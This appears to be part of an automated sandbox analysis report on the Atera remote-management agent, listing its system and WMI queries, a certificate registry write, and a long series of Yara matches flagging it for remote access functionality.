                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Client\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Services.Client.dll VolumeInformation
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF188CC04 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,37_2_00007FFDF188CC04
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFDF18885D4 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,_malloc_crt,_invoke_watson,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,37_2_00007FFDF18885D4
                                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiVirusProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from AntiSpywareProduct
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select displayName,productState from FirewallProduct

                                Remote Access Functionality

                                barindex
                                Yara detected AteraAgent
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.21b52848ca0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 60.0.AgentPackageProgramManagement.exe.2c38b3b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 50.2.AgentPackageTicketing.exe.277dfbd0000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 50.2.AgentPackageTicketing.exe.277dfbb0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.21b5285d0a0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 46.0.AgentPackageUpgradeAgent.exe.1af6aab0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.0.AgentPackageMonitoring.exe.1d722460000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.2.AgentPackageOsUpdates.exe.1fc47d20000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 60.2.AgentPackageProgramManagement.exe.2c38b810000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 50.0.AgentPackageTicketing.exe.277df3c0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 37.2.AgentPackageMonitoring.exe.1d722820000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 26.2.AteraAgent.exe.21b52662f28.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.AteraAgent.exe.16e73870000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.0.AgentPackageAgentInformation.exe.167d1430000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 35.0.AgentPackageSTRemote.exe.15420aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 52.0.AgentPackageOsUpdates.exe.1fc474f0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.AgentPackageAgentInformation.exe.167d18b0000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 57.0.AgentPackageInternalPoller.exe.1aa4ad70000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000032.00000002.3050507203.000000E0F6AF1000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1974508605.0000016E739F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2185697606.00000280BA970000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2696202477.00000215A96B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C029000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3054771885.0000015420BD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2469526724.00000125E46AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2326892892.0000019C0DCB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2523120083.000002BEFAA3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000003.2862846017.0000017CE8290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2364287460.000001D7226DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2527805921.000002BEFBE28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000003.2930634492.0000017CE78A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2779069857.000001FC476FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE807B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2185697606.00000280BA9AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2816629668.0000021B516E0000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2940312439.000000873ECF3000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2380195742.000001D73C906000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2941460212.000001AF00275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000002.2626592410.0000026D2DB40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2364287460.000001D7226D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2525824499.000002BEFB970000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2459960372.00000125CBF84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2691710517.00000215A8E40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2186704723.00000280BB183000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2787380704.000001FC47D22000.00000002.00000001.01000000.0000003C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000000.2625128438.00000277DF3C2000.00000002.00000001.01000000.00000028.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1974508605.0000016E739FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2911371890.0000021B6A7E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1974508605.0000016E73A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2967904200.000001AF6BDA1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.1890578145.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2962478555.000001AF6AC21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3059593001.00000277DF724000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC47F61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2364287460.000001D722713000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2496818468.000000E531CF5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C3B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C593000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3066742035.00000154216D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1973450620.0000016E00089000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.1890578145.0000000005114000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2962478555.000001AF6AC2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2696202477.00000215A9700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3059593001.00000277DF672000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2366426691.000001D722990000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2915185997.0000021B6ABC1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2726183345.00000215C20E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.2185697606.00000280BA9AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000000.2679670717.000001AA4AD72000.00000002.00000001.01000000.00000030.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3058139148.000002C38B60B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2525824499.000002BEFB97C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2205583773.0000012CAFA93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2468014971.00000125E45E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2915185997.0000021B6AC04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2696202477.00000215A9581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80084000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2816995598.0000021B518FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC4855B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC4817D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3069197465.00000277DFBD2000.00000002.00000001.01000000.0000004C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002B.00000003.2538790909.0000026D2DC60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2720526513.00000215C1EC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3058139148.000002C38B62C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2967904200.000001AF6BDCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000002.2326992640.0000019C0DDB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C44A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2962478555.000001AF6ABE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.2204369786.0000012CAF230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3058139148.000002C38B5F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.2630157426.00000235A16A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2392333057.00007FFDF1A19000.00000004.00000001.01000000.0000001C.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2691710517.00000215A8EC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000003.2794275404.0000017CE835A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C4E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2779069857.000001FC476F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2730506028.000001AA4B780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2529295221.000002BEFBEA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C601000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2696202477.00000215A9703000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B52841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2379965931.000001D73C6F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2725136640.000001AA4B02C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000013.00000002.2046712886.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2915185997.0000021B6AB8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C0AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1985587362.00007FFD9B464000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000000.1914378345.0000016E73872000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2911371890.0000021B6A7C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1973450620.0000016E0008C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.2623179398.00000235A1300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000021.00000002.2325162518.000001944A6C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001F.00000003.2232568454.0000019C0DDD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.2623179398.00000235A131B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE802D2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3326560482.00000277F8637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2736724893.000001AA4BA62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2529295221.000002BEFBEB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3063112653.0000015420E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2736724893.000001AA4BB21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3172608638.000002C3A48A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2459960372.00000125CBF56000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3059593001.00000277DF67A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2809923548.0000003296F15000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2720714213.00000215C1EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000002.2931529334.0000017CE78B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC480FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2736724893.000001AA4BB2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1975925687.0000016E760BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000029.00000002.2691710517.00000215A8EC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1974338755.0000016E739DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2967904200.000001AF6BDEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2185698631.00000167D16B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2779069857.000001FC47794000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B5205B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3066742035.00000154215C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C4F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80689000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C54F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2779069857.000001FC47740000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C5D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000002.2932103351.0000017CE8363000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000030.00000002.2623179398.00000235A1308000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.2458294221.00000125CB57B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE8016C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000000.2661915081.000001FC474F2000.00000002.00000001.01000000.0000002B.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C5EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2967489603.000001AF6B085000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000034.00000002.2789370388.000001FC481A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2380019255.000001D73C8F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1973450620.0000016E0017C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000039.00000002.2736724893.000001AA4BB2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2962478555.000001AF6AC6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C5A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000032.00000002.3071249917.00000277E00F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000C.00000002.1973450620.0000016E000B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000025.00000002.2366809057.000001D72349F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002E.00000002.2967904200.000001AF6BD20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.2498500115.000002BE80001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3072832109.000002C38C3A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000003C.00000002.3050301533.000000E3C794F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3054771885.0000015420B9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B52A7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001A.00000002.2825307729.0000021B526ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000023.00000002.3066742035.00000154216C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2188999803.00000167EA688000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000036.00000003.2930446134.0000017CE78AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
